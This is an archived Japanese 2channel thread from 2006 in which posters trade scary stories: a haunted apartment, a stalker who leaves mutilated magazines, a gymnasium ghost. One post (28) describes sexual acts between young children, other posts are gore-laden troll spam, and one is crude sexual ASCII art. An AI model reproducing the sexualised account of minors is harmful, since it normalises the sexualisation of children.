5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

死ぬ程洒落にならない怖い話を集めてみない?145

1 :本当にあった怖い名無し:2006/10/05(木) 19:04:43 ID:w8gzX2S20
貴方が聞いた・体験した怖い話や、2ちゃんの色んなスレから拾ってきた死ぬ程洒落にならない怖い話を集めてみませんか?
ジャンルや、事実の有無は問いません。要は最高に怖けりゃいいんです。創作も歓迎です。

【重要】長文を投稿する時はメモ帳等で全部書き終えてから一気に投稿しましょう。
携帯の人もそれなりに配慮しましょう。

○「あまり恐くないかも」「書いても良いですか?」等の前置きは全然いりません。
  あまり怖くない話もいりません。
  余り怖くない話と思うなら「ほんのりと怖い話」スレへお願いします。

http://hobby7.2ch.net/test/read.cgi/occult/1159309298/

○コピペの際には転載元を提示。2ch以外からのサイトからは許可を取ること。
  既出の話には注意しましょう。

○感想、批評はOK。ただし叩き、煽りと批評は違います。
  日頃気をつける程度に、言葉には気を遣いましょう。
  第三者による「批判の批判」は、無意味ですのでやめてください。

○ここの投稿を利用しての二次創作は、原則的に無料配布としてください。
  商業ベースの商品化を望むなら、2ch管理人まとめサイト管理人及びオカ板住人へ報告し議論してください。

 まとめサイト・投票所         (モバイル版)
http://syarecowa.moo.jp    http://090ver.jp/~usoriro/ 




2 :本当にあった怖い名無し:2006/10/05(木) 19:05:14 ID:w8gzX2S20
前スレ
http://hobby7.2ch.net/test/read.cgi/occult/1159108400/


3 :本当にあった怖い名無し:2006/10/05(木) 19:20:09 ID:4JugQ73x0
メモ帖にカキコしてるうちに新スレ立ってた・・・
かなり長文になるのでスルー推奨。物好きだけみれ。

これは自分が2年くらい前の話なんだが、当時色々親と揉めて一人暮らしをすることになった。
とにかく金がないので家賃が月2万3千で1DK、トイレバス付きってところをうまく見つけたので
そこにもぐりこむように生活を始めた。

自分にはIとKっていう友人がいて、よく三人で遊んでた。
引越しのときもその二人に付き合ってもらったんだけど、Iのほうがなんか気乗りしないというか
妙にピリピリしてる。
「手伝ってもらってマジで悪い、あとでなんか奢るからさ」
というと
「いや、そういうことじゃないんだ。気にしないでよ。」
と返すばかり。
部屋の掃除とかいつもやってもらってるIは、こういうことで怒るような性格ではないと分かっていたの

最初は何か向こうのほうでトラブルでもあったのかな?程度にしか考えてなかった。

4 :2:2006/10/05(木) 19:21:11 ID:4JugQ73x0
で引越し作業も終わって、深夜料金覚悟で3人でファミレスに行ったとき、
「本当はこういうこと言いたくないんだけな」
っていきなりIが語り始めた
「おまえらさ、あの部屋で何か感じたりとか、何かみたりしなかった」
「は?」
「いや、別に。」
もう寝耳に水というか、最初は悪い冗談かと思った。その時の自分は幽霊否定派だったし。
「あそこでさ、見たんだよ。手。バスのところから伸びてる手」
「オイ、マジそういう冗談笑えないって」
ぶっちゃけ半ば切れて怒り半分でそういうと。
「いや、ごめん。そういう意味じゃないんだ。Dには悪いと思うけどさ、あとでなんかあったとき後悔し
たくないから
一応注意ってことで、何もないなら別にいいんだ。」
自分としても気味は悪いが、これ以上話して空気が悪くなるのは嫌だったし、
そこで打切ってさっさと忘れようと努めた。

でファミレスで解散して戻ったのはいいんだけど、どうにもさっきの言葉が頭から離れなくてこまる。

仕方が無いのでPCの電源をつけて、メッセ始めたんだけどそこからだった。
どういうことか漢字に変換できなくなる。
IMEの故障かと弄ってみたけど変化なし。
引越しの作業でどっか悪くなったのかと思うと、Iに学校が終わったらPC見てくれ。とメールしてその日
は寝る事にした
(IはPCが得意で、自分のPCのメンテとかも勝手にやってもらってる)
その日の夜はそれで問題なく終わった。

5 :3:2006/10/05(木) 19:22:18 ID:4JugQ73x0
翌日、Iが来てPCをつけてみると、何の問題もなく変換できる
「別に問題なさそうだけど?」
「えー、いや昨日はマジでつかなかったんだけど。」
「まぁ、治ったから別にいいじゃん」
その後は適当にゲームの話してIは帰って行った。
途中まで見送りにいって、家に帰ると、不思議な光景が待っていた。
何故かテーブルの上にノートサイズの真っ白い紙とボールペンがちょこんと置いてある。
確かにボールペンは自分のものだけど、紙に関しては記憶に無いし、そもそもこの家に来てからペンを
握った試しが無い。
IはずっとPCの前にいたのでこんなことするはずないし、と思うとなんだか背筋が寒くなってきた。
気味が悪かったので紙をゴミ箱にいれて、ボールペンも机の引き出しにいれ、布団を頭から被るようにして寝た。

それからなんだけど、毎日のようにバイト先から帰ってくると、机の上に紙とボールペンが置いてある。
本当にただただそれだけなんだけど、日に日にストレスが溜まってしようがなかったので、休日におりをみてKとIに相談した。
Kはただのビビリなのでただ驚くだけだったんだけど、Iのほうは話が終わるとすぐに
「分かった。明日休みだからお前の部屋をウェブカメラで監視してやるよ。
もしストーカーとか泥棒の類だったらすぐにおまえに電話するから」
なんでもネット経由でテレビ電話のように監視ができるらしく、3000円もあれば十分だというのでそのまま家電屋に直行。
その日はIやKも泊まっていった。

6 :4:2006/10/05(木) 19:23:39 ID:4JugQ73x0
そこには確かに自分の部屋が写っていた。そして冗談でもなんでもなく、自分の部屋にいた女の姿も・・・
いわゆるブ女。見れたもんじゃない体型に、ビチビチのジーパンとTシャツ。
そして、何故かぼやけて良く見えない顔。
Iが無言で次々と画像を送っていく。
廊下から出てきたそれが、自分の部屋をぐるぐると、何かを探すように回り、そして引き出しからボールペンを取り出して
置いたあと、満足そうにさっていく様子が。
「分かったろ?まじでいたんだよ。とにかくおまえはもう家に帰るな。今までは平気だったけど、これからも何もないって保証はどこにもないぞ?」
恐怖で泣いたのはこれが生まれて始めてだった。
体がガクガク震えて、顔が熱くて溜まらない。失禁寸前のところでIに支えながらトイレに連れて行ってもらい、そこで喚き散らした。

一暴れして落ち着くと、Iはこういった。
「まぁ、あれだよ。こういうのはマレにいるんだ。そういうことにしとけ。
これはこの家から出てくることはないはずだから、おまえはもう家に戻るな。
で新しい家を探せ。その間くらいはこっちで面倒みれる。
新しい家見つかったら、俺とKで引越し作業するから。それでいいだろ?」

翌日のバイトは休みをとって、自分は不動産屋を駆け巡った。
もう怖くてしょうがなく、一秒でも早くあの家から縁を切りたかった。
幸いにも午前中には契約が取れて、午後には向こうの家の解約手続きに踏み切ることができた。
何か問題でもあったのか?とやたらとしつこく聞かれた辺り、こういうことは始めてだったのかもしれない。
とにかく今よりいい条件の家を紹介されたから、先着だから時間がなくて思わずそっちに申し込んだ。
といって何とか切り抜け、2日後には引っ越すことができた。
その間何の問題もなく、突然引越しの手伝い(しかも当の本人が不在)で一日をフイにしたKも
多少モンクはいいつつも特に問い詰められることはなく、無事にあの家から離れることができた。
新しい家に変わってから、しばらくはビクビク怯えていたけど、何事も1週間も過ぎるとようやく調子を取り戻してきた。

7 :5:2006/10/05(木) 19:25:32 ID:4JugQ73x0
それから少し経って、再びファミレスで集まることになり、Kにようやく今まで起こったことを説明した。
Kは学校で怖い話(SFC)を本当にあった話だと信じてしまうような人間なので、むしろ
「それヤバクね?」「次は俺らがのろわれるんじゃねーの?」
とかいちいちこちらを不安にさせるようなことをいう。
そんなときにIが一枚の紙をテーブルの上に置いた。
「この紙、なんだかKは分かるよな?」
「ああ、引越しのとき机の上においてあった奴でしょ?」
「これさ、真っ白い紙に見えるけどよくみると文字が書いてあるんだよ」
Iはもう一枚似たような紙を取り出すと、さっきの紙の上に重ねて、バッグから取り出した鉛筆でガリガリ擦り始めた。
そうして出来上がったものは
『さびしい、いたい、さびしい、いたい』
そんしばらく続いてたが単語がノートの半分を過ぎたあたりで
『さびしい、いない、さびしい、いない』
に変わり、最後のほうになると
『しね、しぬ、しね、しぬ、しね、しぬ』
見ていて頭が痛くなるような文に変わっていた
最初のほうは薄くて全部は読めないものも多かったが、最後のころにはしっかりと文字が浮かび上がっていた。
「一応調べてみたんだけどさ、あのアパートで死んだとか自殺した。って奴は新聞とかネットではいなかったよ。
あいつが何だったのか?って聞かれると困るけど、多分Dと馬が合ったっていうのかな?多分そんな感じだと思う。
事故みたいなもんなんだよ。きっと。」
それから誰が言ったわけでもなく、三人ともその話を止めてカラオケに行き、3人でまた一晩泊まって終わった。

あれから今まで、何の問題もおきてない。
Iが一度だけ、詳しくその手に関する話しをしてくれたけど、これ以上長文はうざいと思うのでここで終わり。
最後まで付き合ってくれてありがとう。

8 :本当にあった怖い名無し:2006/10/05(木) 19:28:16 ID:s8elLNdI0
むしろ
きになるお

9 :本当にあった怖い名無し:2006/10/05(木) 19:28:59 ID:gRacjpnV0
その紙と映像をうpしない事にはねぇ。

10 :本当にあった怖い名無し:2006/10/05(木) 19:29:29 ID:TnSFXQf/0
otu

11 :本当にあった怖い名無し:2006/10/05(木) 19:30:57 ID:9u8uID2L0
>>1
乙。もう新スレ立たないと思ったよ

12 :本当にあった怖い名無し:2006/10/05(木) 19:50:47 ID:ocsFJcDz0
>>5 凄く面白かった。ありがとう。

13 :本当にあった怖い名無し:2006/10/05(木) 19:52:47 ID:ocsFJcDz0
ゴメン。間違えた。
>>3〜7 だった。
改めて面白かったよ!

14 :本当にあった怖い名無し:2006/10/05(木) 20:03:31 ID:v3HVV4WS0
このスレのまとめサイトを読んでいた時の事。
Part1から読み漁りPart5まで進んだ頃に、何か視線を感じた。
部屋の中には私一人しかおらず、1歳の息子は寝室で眠りこけている。
視線は正面…机の上から感じた。
机の上には2歳の誕生日を目前に病死した娘の遺影がある。
「それ以上読んじゃダメ」
そんな事でも訴えているのだろうか?写真なのに、やけに瞳に生気がある。
遺影をそっと撫で、気のせいだと思って読みすすめていると、
カタカタと小さく音がした。地震かと思ったが、何も揺れていない。
正確には、部屋の中は揺れていない……
パソコンと遺影の載った机だけが、カタカタと揺れているのだ。
え?…何これ?
暫くすると揺れも収まり、まだまとめサイトを開いたままにしてある
モニターに、ふっと目をやった時…
ぶつっ!と音がして、パソの電源が切れた。
びっくりして、思わず軽く後ろに仰け反った私の首に
「何か」がひやりと触れた。
娘の遺影は、その「何か」を見ていて、
それが良くないものだと知らせようとしていたのだろうか?

15 :本当にあった怖い名無し:2006/10/05(木) 20:14:35 ID:0BiD/csI0
そんなこというなら管理人はどうなるんだよ

16 :本当にあった怖い名無し:2006/10/05(木) 20:45:44 ID:9u8uID2L0
↓このニュース洒落にならないな
http://www.sanspo.com/sokuho/1005sokuho041.html


17 :本当にあった怖い名無し:2006/10/05(木) 20:49:33 ID:lDMBthuq0
>>7
何で紙重ねたの?
普通重ねずに浮き上がらさない?

18 :本当にあった怖い名無し:2006/10/05(木) 21:15:56 ID:Oa8afvGwO
>>1
オツカレーション

19 :本当にあった怖い名無し:2006/10/05(木) 21:42:59 ID:6drEt+/N0
>>16
洒落にならないし、怖いけどスレチだよスレチ!!!

20 :本当にあった怖い名無し:2006/10/05(木) 22:49:44 ID:oHhbF4dJO
いや、セーフだ。
リアルな分、下手な創作より洒落にならない。

21 :本当にあった怖い名無し:2006/10/05(木) 23:25:51 ID:ZCHEB1NN0
いい雰囲気で始まれたな・・・

22 :本当にあった怖い名無し:2006/10/05(木) 23:52:22 ID:Oa8afvGwO
>>21
すんぱいすんな〜もう荒らしはこねぇがら

23 :本当にあった怖い名無し:2006/10/05(木) 23:59:16 ID:tmTw9lmrO
>>22どこの秋田の方ですか?

24 :本当にあった怖い名無し:2006/10/06(金) 00:01:57 ID:Oa8afvGwO
>>23
なんだおめっ仙台をばがにすんなー牛タンあっがんな!

25 :本当にあった怖い名無し:2006/10/06(金) 00:05:45 ID:KCOgm/iU0
うしたんっておいしいよね〜

26 :本当にあった怖い名無し:2006/10/06(金) 00:08:15 ID:8jBDg5EfO
>>25
ぐぐ…おめもバガにするってか?
ぐそったれーおんぼえてろよ!

27 :本当にあった怖い名無し:2006/10/06(金) 00:16:46 ID:9opfYjtO0
もうそんなのいいから怖い話してくれよ
せっかく荒らしも去ったことだし

28 :本当にあった怖い名無し:2006/10/06(金) 00:23:51 ID:ARyZj3qUO
小学校2年の頃だったかな?
生まれた時から仲良しの近所の女の子がいた。
近所の同学年の友達の中でも俺とその子はマセてて、幼稚園の頃にはディープキスもする様になっていた。

セックスの知識こそ無いが、幼いながらにお互いを性的に刺激しあう事が続いた。

小学2年の秋。
好きという感情も無く、ただ異性の身体の構造に興味があり、いつもの様に、その子の家の納屋でお互いの性器を触ったり舐めたりしていた。
その時だった。

二人しかいないはずの納屋の奥で明らかに自分達より大きな生物が動く気配がした。

慌ててパンツを穿く二人。

現れたのはその子の祖母だった。
「こんな所で何やってんだ!さっさと出な!言いつけるよ!」
と怒鳴られ、一目散に逃げた。

でも子供に理性を求めても無理。
俺達は納屋の入り口を観察出来つつも納屋からは死角になる物置の中でお互いの身体をいぢり合った。

そのあと、物置で二人、くっつきながら納屋の出口を観察していた。

先に出てきたのは俺の親父だった。

これ以上は話せない。



29 :本当にあった怖い名無し:2006/10/06(金) 00:25:58 ID:9EAA4/jL0
じゃあ俺が今から投稿するわ
あんま期待はしないでくれ

30 :本当にあった怖い名無し:2006/10/06(金) 00:27:09 ID:RGL2CnZl0
うん・・・まぁ・・・おもしろかったよ・・・

31 :エロ本:2006/10/06(金) 00:27:14 ID:9EAA4/jL0
俺の地元は田舎で車道から逸れるとすぐ森とか林って感じになってる。
で田舎の方に住んでいたことのある人ならわかるだろうが
そういう場所にはよくエロ本が捨ててある。
厨房の頃のある夏の日、俺も学校が終わった後に友達と二人
自転車でそのブツを探しにいった。
そこは普段車の通りも少なく、ましてや森の中となると
誰もいない。
俺らは好都合と思いブツを探し始めた。
しばらく探し続けていても中々状態のいいのは見つからなかった。
探しに行った事のある人ならわかると思うが
そういう場所に捨ててある本ってのは湿ったりしてて
拾って帰るのをためらうような状態のものが多い。
そんな時友人が俺のことを呼び止めた。
「おい、誰かいるぞ」
その呼びかけにびっくりした俺は情けないことだが
「ひぃぃっ!」
と声を上げてしまった。エロ本探しなんかしてることが女子なんかにばれたら
とても恥ずかしくてたまらない。
俺は焦って辺りを見回した。すると友人が俺の肩を叩いてある方向を
指差した。俺らがいる場所より更に奥のほうに確かに誰かがいた。
遠くてよくは見えないが背格好から判断するに俺らより大分年上の
男であるように思えた。雰囲気から察するに20代くらいに見えた。
俺らの方に来ないところをみると別に注意しに来た訳でもなさそうだった。
「あいつもエロ本探しに来てんじゃねーの?」
と友人が軽口を叩いた。俺もそんなとこだろうと思い再びブツ探しに戻る。
またしばらく探していると友人が
「さっきあいつがいた辺りに行ってみねー?
もしかしたらあいつが捨てにきたのかもしれないし」
というのでさっき男がいた辺りに俺らは歩いていった。
友人の予測どおりそこには数冊のエロ本が捨ててあり、状態もよさそうだった。
「ラッキー、確かにお前の言ったとおりだったな」
そう言って俺らはその数冊を二人で山分けして家に帰ることにした。

32 :エロ本2:2006/10/06(金) 00:28:40 ID:9EAA4/jL0
俺らは自転車を停めていた車道の待避所?みたいなところまで戻ってきて
そこで友人と別れた。もう辺りは大分暗くなっていた。
その時にはもう帰ってエロ本を見ることばっかり考えていた。
自転車に乗ってふと今までいた森を見るとさっきの男がまだいるように見えた
「あいつ、まだ何やってるんだ?」
少し不思議に思ったが特に気にせずwktkしながら家に帰った。
家に帰って自分の部屋に戻ると、早速戦利品の確認を始めた。
あったのを適当に拾ってきて中身もよくチェックしてなかったので
あまり期待もしてなかったのだが中々使えるようだった。
そうやってその中の一冊のページをパラパラとめくっていると、何か違和感があった。
メジャー?なタイプのエロ本はグラビアの部分と漫画の部分に分かれている。
そのグラビアの部分が何かおかしかった。
不思議に思った俺はそこでページをめくるのを止めた。
そしてそれを見て俺は思わず声を上げてしまった。
そこに写っている女優の顔の目の部分に穴が開いていた。しかも無数に。
恐らく針か何かとがった物で突き刺してあったのだろう。
そしてその次のページは張り付いていた。透けて見える女優の体部分が何か赤い。
血のようである。
しかし気持ち悪かった俺はそれをはがす気にはならなかった。
その張り付いていた部分のページには何故か自分と同じ歳くらいの女の子の写真が
挟まっていた。カメラのほうを向いていないので盗撮か何かかもしれないと俺は思った
そしてその写真にも目の部分には無数の穴が開いている。
さすがにその本を持っておく気にはならず、次の日また捨てに行こうと思った。

33 :エロ本3:2006/10/06(金) 00:29:26 ID:9EAA4/jL0
そうしているうちに塾に行かなければならない時間になったので、戦利品の確認をやめ
塾に行くことにした。準備をして玄関から出て行くと俺の家からすぐのとこにある
電柱の影に男がいた。近づかなかったのでよくはわからないが
さっき森にいた男ではないかなと思った。あの男が本を捨てたのだろうか。
怖かったのでさっさと自転車に乗って
俺は塾へと向かった。
10時頃に塾を終えて家にたどり着くと、電柱の影に男の姿は無かった。
俺は一旦家の庭に自転車を停めて、もう一度家の周囲を確認することにした。
よく見回してみたが見える範囲に男の姿は無かった。
考えすぎかなと思い、家に戻ろうとすると不意に声をかけられた
「あの本良いでしょ?」
俺がビビッて振り返ると真後ろにその男が不気味な笑みを浮かべて立っていた。
足音も聞こえなかったので油断していた。腰が抜けそうになったが死に物狂いで
家へとダッシュすると、急いで鍵をかけた。
その夜は恐ろしくて、クーラーも無くて暑かったが
家の窓を閉め切ってカーテンも閉めて布団にうずくまっていた。
そして次の日、友人に昨日のこと話したが、友人はそんなことはなかったと言った。
しかし怖かった俺は友人について来て貰い
元あった場所に本を捨てた。(不法投棄スマン)
その日からその男を見ることは無かったが、あの日以来俺はエロ本を拾いに行ったことはない。

長文、駄文スマソ

34 :本当にあった怖い名無し:2006/10/06(金) 00:35:20 ID:NWxYs0iDO
>>33
リアルタイムで読ませてもらった…。
乙!

35 :本当にあった怖い名無し:2006/10/06(金) 00:37:52 ID:WjVrwvq90
>>31-33
怖いよ・・・

36 :本当にあった怖い名無し:2006/10/06(金) 00:43:01 ID:MRY1vmXTO
ギャル話キボンヌ

37 :本当にあった怖い名無し:2006/10/06(金) 00:59:20 ID:9opfYjtO0
俺は友人がつまらないからと捨てたエロ本を夜中コッソリとりに行ったことがあるな

38 :本当にあった怖い名無し:2006/10/06(金) 05:36:14 ID:pXeQc6Ti0

しい選択だ。あなたは思
ってい
る。どんな事

んな殺人が起
ころうとそれは
あなたと


縁だと。そうだろ
う?でも違う。今から、この瞬間からね。あなた
は本当に苦しむ。



あなたは本当
に怯える。

39 :本当にあった怖い名無し:2006/10/06(金) 05:36:52 ID:pXeQc6Ti0
恐怖 するんだ 。ぼく
が 最期に見 たそれの
忌まわしい姿

ぼくの目を抉ったそれの嫌らしい
声。
千切られた腕が咀
嚼される音。
ずるりと腹から臓物を引
きずり出される感触。触られた脾臓 臓器

そう さ、ぼくの感じ たものすべて。

40 :本当にあった怖い名無し:2006/10/06(金) 05:37:30 ID:pXeQc6Ti0
それがあなたのものだ。これはそんなゲームだ。
これはそんなゲームだ。これはそんなゲームだ。
これはそん
なゲームだ。これはそんなゲームだ。これはそん
なゲームだ。これはそ
んなゲームだ。これはそんなゲームだ。






 な
ゲー
ムだ

41 :本当にあった怖い名無し:2006/10/06(金) 05:40:55 ID:pXeQc6Ti0
これはそんなゲームだ。これはそんなゲームだ。
これはそんなゲームだ。これはそんなゲームだ。
これはそんなゲームだ。これはそんなゲームだ。
これはそんなゲームだ。これ はそんなゲームだ。
これはそんなゲームだ。これはそんなゲームだ。
これはそんなゲームだ。これはそんなゲームだ。
これはそんなゲームだ。これはそんな
ゲームだ。これはそんなゲームだ。これはそんな
ゲームだ。これはそんなゲームだ。これはそんな
ゲームだ。これはそんなゲームだ。これはそんな
ゲームだ。これはそんなゲーム

だ。だ。だ。だ。だ。だ。だ。だ。だ。だ。だ。。だ。
だ。だ。だ。だ。だ。だ。だ。だ。だ。だ。だ。だ。
だ。だ。だ。だ。だ。だ。 だ。だ。だ。だ。だ。だ。
だ。だ。だ。だ。だ。だ。だ。だ。だ。だ。だ。だ。
だ。だ。だ。だ。だ。だ。だ。だ。。。。。だだだだだ
だだだだだだだだだだだだだだだだだだだだ
だだ。だ。だ。。。。。。。。。。。。。。。。だだだ。。
。。。。。。。。だ。だ。だ。だ。だ。だ。だ。だ。だ。
だ。だ。

42 :本当にあった怖い名無し:2006/10/06(金) 05:42:38 ID:pXeQc6Ti0
なゲーなゲーなゲはそんなゲームだーなゲーな
ゲーなゲーなゲーなゲーなゲーはそん
なゲームだなゲーなゲーなゲーなゲーはそんな
ゲームだはそんなゲームだこれはこれはこれは
これこれはこれはこれはこれはこれはこれはこ
れはこれはこれはこれはこれはこれはこれ
はこれははこれはこれはこれはこれはこれは
これはこれはこれはこれはこれはこれはこれは
これはこれは
これはこれ

ゲームゲームゲームゲームゲームゲームゲーム
ゲームゲームゲームゲこれはそんなゲームだ。
ゲームゲームゲームゲームゲームゲームゲーム
ゲームゲームゲームゲームゲーこれはそんな
ゲームだ。ムゲームゲームゲームゲームゲーム
ゲームゲームゲームゲームゲームゲームゲーム
ゲームゲームゲームゲームゲームゲームゲーム
ゲームゲームゲゲゲゲゲゲゲゲゲゲゲゲゲゲゲ
ゲゲゲゲゲゲゲゲゲゲゲゲゲゲゲゲゲゲゲゲゲ
ゲゲゲゲゲゲゲゲゲゲ


43 :本当にあった怖い名無し:2006/10/06(金) 05:56:22 ID:N20LkovHO
     (;´Д`)   シコシコシコシコ
    _(ヽηノ_
      ヽ ヽ

      ( ゚д゚ ) !!!!!!!!!
    _(ヽっノ_
       ヽ ヽ

     ( ゚д゚ )っ
      (彡ηr しこしこしこ・・・・・
.       i_ノ┘

    ⊂( ゚д゚ )
.     ヽ ηミ)
     (⌒) |しこしこしこ・・・・・
        三 `J

44 :本当にあった怖い名無し:2006/10/06(金) 07:16:18 ID:F7W4jKOW0
こっちくんなw

45 :本当にあった怖い名無し:2006/10/06(金) 10:07:52 ID:o988stn+0
さぁどんどん怖い話集めていこうぜ

46 :本当にあった怖い名無し:2006/10/06(金) 10:12:50 ID:o988stn+0
さぁどんどん怖い話集めていこうぜ

47 :本当にあった怖い名無し:2006/10/06(金) 10:13:32 ID:o988stn+0
間違って2回書き込んじゃった
てへっ・・・

48 :本当にあった怖い名無し:2006/10/06(金) 10:53:49 ID:Zy9FeKIKO
>>38-42
どこを斜め読み?

49 :本当にあった怖い名無し:2006/10/06(金) 11:40:39 ID:MRY1vmXTO
ギャル話続きマダー?




オパイマンセー

50 :本当にあった怖い名無し:2006/10/06(金) 11:43:47 ID:o988stn+0
あらしはよそでやってくれよ

51 :本当にあった怖い名無し:2006/10/06(金) 11:44:46 ID:o988stn+0
あらしはよそでやってくれよ

52 :本当にあった怖い名無し:2006/10/06(金) 11:46:16 ID:o988stn+0
ちょwwwまた2回かきこんじゃったwwwwww

53 :本当にあった怖い名無し:2006/10/06(金) 11:46:45 ID:8jBDg5EfO
今さっき起きた出来事です。
洒落になんないくらい怖かったのできいてください。
今日は仕事が休みで、新聞の広告をみたら、近所でケーキセールがあるというので大のケーキ好きの私は台風のなかその店まで車で行きました。
で、店に着いてさぁ中に入ろうとしたら、ドアに「本日休業」の看板が掛けてあり、(あれ?おかしいな〜?)と思いも仕方がないかと家に帰ることにしました。
で家に着き、テレビをつけてみたら…

54 :本当にあった怖い名無し:2006/10/06(金) 11:52:53 ID:o988stn+0
       ヽ|/
     / ̄ ̄ ̄`ヽ、
    /         ヽ
   /  \,, ,,/    |
   | (●) (●)|||  |
   |  / ̄⌒ ̄ヽ U.|   ・・・・・・・・ゴクリ。
   |  | .l~ ̄~ヽ |   |
   |U ヽ  ̄~ ̄ ノ   |
   |    ̄ ̄ ̄    |


55 :1:2006/10/06(金) 11:54:08 ID:qK3g+dFy0
これは私が小学生のときの話です。
当時は所謂「学校の階段」がブームになった時期で「七不思議」といった怖い話が非常に盛んな時期でした。
子どもだった私達は、「自分達の学校に七不思議がないのはつまらなから、七不思議を作ろう」と考え
仲の良い友達6人で、休み時間になると校内探検にでかけ、立て付けの悪いドアを見つけてはいじめて死んだ男の子。
奇妙な染みがあれば幽霊、行き詰ると「深夜の2時に〜」といった方法で次々とデッチ上げの七不思議を作っていきました。
そんな中で自分たちの傑作が、放課後に体育館から聞こえてくる「トントン トントン」という金槌で何かを叩くような音でした。
これを私達は「体育館の建設中に死んだ作業員」として「実際に確かめられる七不思議」としてスパイスし
たったひとつの真実だけであたかも他の全ても正しいというような錯覚に陥らせることができました。

私の作った七不思議の噂は2週間程で学校の大部分に広まりました。
しかし、ある日先生が朝のホームルームで、こんな警告をしました。
「この学校に七不思議なんてものはありません。誰かが作った性質の悪い悪戯です。
最近七不思議を確かめようと遅くまで残る生徒も出ているようですが、決してそんなことはしないように。
見つけた生徒は厳しく注意します」
しかし私達はそこであることに気がつきました。
私達が実際に確かめることができるような噂は、真っ赤な夕焼けの日に階段を落ちる生首と
例の体育館の話。この二つしかなかったのです。
どちらも他愛のない話でしたし、別に危険な場所でもありません。
今考えてみれば放課後に遅くまで残ることを危惧しただけと考えたのでしょうが、私達はそれを
「きっとどちらかがほんとうのことで、それがばれてしまってはまずいからだ」
と思い込み、むしろ確かめてやろうと思いました。

56 :2:2006/10/06(金) 11:55:07 ID:qK3g+dFy0
まず私達も実際に聞いている、体育館を調べようと決めました。
音はいつも聞こえるわけでなく、週に1度か2度、全く聞こえないときもままありました。
そこで私達は放課後サッカーやバスケットに興じながら、密かに耳を澄ませその機会を伺いました。
それは以外にも早く、調査開始から4日目。
「トントン トントン」とあの音が聞こえてきます。
私達は興奮しながらも、一度校門から外に出て、裏のフェンスの間からまた学校に忍び込み、体育館に向かいました。
幸いにも鍵はかかっておらず、重い扉を横に押しやり、まんまと中に侵入することができました。
「トントン トントン」
果たしてこの音はどこから聞こえてくるのか?
用具入れ、トイレ、それとない場所を探しますが、どこもはずれです。
「ステージとか、その裏じゃねーの?」
祐介がそう提案します。
「えー、それはまずくないか?」
ステージに一般の生徒が上がることは普段めったになく 先生に見つかったら激しく怒られると思いました。
「俺、放送委員だからよくあそこにいくよ。大丈夫大丈夫、もし見つかったら鉛筆落としたから探しにきた。って言えばいいんだよ」
結局彼に押された形で、私達はステージへと足を運びました。
心なしか、音が近くなっているように感じます。
「ほら、やっぱり。こっちでいいんだよ」
得意げになる彼を見て、少々イラつきながらカテーンの裏や放送室の辺りを探ります。
しかし、なかなか見つかりません。
そんなときでした、1人が上を見つめながら呆然としているのです。
「おい、上になんかあるの・・・・!?」
私達は一斉に上を見つめ、そして戦慄しました。
ステージの上には、2階から更に上に、2.5階とも言えるスペースになっています。
そこには体育祭や卒業式などで使う用具など、今では殆ど使わない類のものが置かれています。
そこは丁度いたを張り合わせたような床で、その感覚が広く間に隙間があるため、下から覗くこともできますし
逆にあちらから下を覗くとかなり怖い思いをしました。

57 :3:2006/10/06(金) 11:56:19 ID:qK3g+dFy0
その場所で、何かがいたのです。
人でした。それは間違いありません。白い布を被った誰か。
それは私達をみていました。
人のような、人ではないようなそんな何か。
それが私達をじっと見つめ、そして動き出しました。そう、奥ではなく手前に。
そちらには降りるための階段が・・・
「逃げろ!」
誰かが叫びます。
私達は蜘蛛の子を散らすように「わー」
と叫びながら、一目散に出口へと走りました。
「追ってきてるよ!!」
後ろから純一の声がしました。
「急げ!」

靴も履かずに、渡り廊下を駆け抜け校舎に入ると私達はすぐさま職員室に駆け込みました。
驚いたのは先生達で、6年生の問題児達がドアを壊しそうな勢いでなだれ込んできて
「体育館に幽霊がいた!」だの「やばいよ、先生やばいよ」などと要領を得ない言葉で騒ぐのですからたまったものではありません。
男の先生達が変質者か何かが紛れ込んだのかと職員室を出てゆき私達は、女の先生達に慰められながら、先生達が帰ってくるのを待っていました。

特に何もなかったのか、先生達が返ってくると、今度は責められる番でした。
なんで体育館に行ったのか?何を見たのか?と質問され、学校の怪談を調べに言ったことがわかり
強烈な一撃を喰らって、その日は帰されました。
翌日、放課後になって担任の先生から呼び出しを受け、私達は図書準備室に集められ、
そこでこんな話を聞かされました。

体育館から聞こえてくるあの音の原因は、先生達の間でもはっきりとはわかっていないそうです。
しかし、8年ほど前にこんなことがあった、教えてくれました。

58 :4:2006/10/06(金) 11:56:59 ID:qK3g+dFy0
体育館の壁には、収納式のボックスのようなものがあり、そこには式典などで使うパイプ椅子がしまってあります。
8年前、あるクラスでいじめがあり、その中にいじめらっこ1人を閉じ込めて一晩放置した事件があったそうです。
夜になっても帰ってこない子どもを心配しご両親から電話があった学校側は
すぐに校内をくまなく探しました。しかし、どこにもみつかりません。
生徒達の中で知ってるものはいないかと、緊急連絡網を使って調べたところ
いじめっこの1人が体育館のパイプ椅子入れに閉じ込めたことを白状しました。
体育館は一度調べてあり、いたら助けを呼ぶのではないのか?と思いつつも先生達はもう一度、体育館に行き
その場所を調べました。
するとそこにはその少年が、小さく体を丸めて脂汗で背中を濡らしながら、ガクガクと震えていたそうです
その子は酷く何かに怯えていて、何のショックが声が出せなくなっていたそうです。
始めは暗い闇の中に何時間も閉じ込めらていたことが原因だと思ったそうですが、その子の話を聞くと
体育館に誰かいて、何かを叩いている。そして笑っていた。もし自分が少しでも声を出したら
きっと自分もそうなると思った。
そんなことを筆談で伝えたそうです。
しかし、夜の学校に何者かが侵入したとしたら警備会社に連絡がいくはずです。
ですが、機械の故障もなにもなく、警備会社からの答えはその子の聞き違えかなにか。ということでした。

「きみ達が見たのはそれかもしれない。先生もそんなこというのはばかげているとは思うが
先生はきみ達のいうことも信じてる。だからこそこのことも、それから七不思議のことも言わないで欲しい。」

それからというもの、火付け役だった私達が一切七不思議のことを口にしなくなったせいか
噂は自然と消えていった。
体育館に住んでいる、あの霊はいったいなんだったのか?
あそこで何をしていたのか?私にはもう分からないし、知ろうという気もない。
ただ、あの後教えてもらったのだが、純一がこんな声を聞いたらしい
「あなたも?」
それにどんな意味があるのか。それは私達の誰一人としてわかるものはいませんでした。

59 :本当にあった怖い名無し:2006/10/06(金) 12:01:25 ID:o988stn+0
先生同士がセックルしてたとかだったりして

60 :53の続き:2006/10/06(金) 12:17:47 ID:8jBDg5EfO
テレビでその店の不正行為(詳しくはいえません)のため急遽、休業になったと報じられていました。
その店にはよくケーキを買いにいくので、「マジかよ…」と思いました。
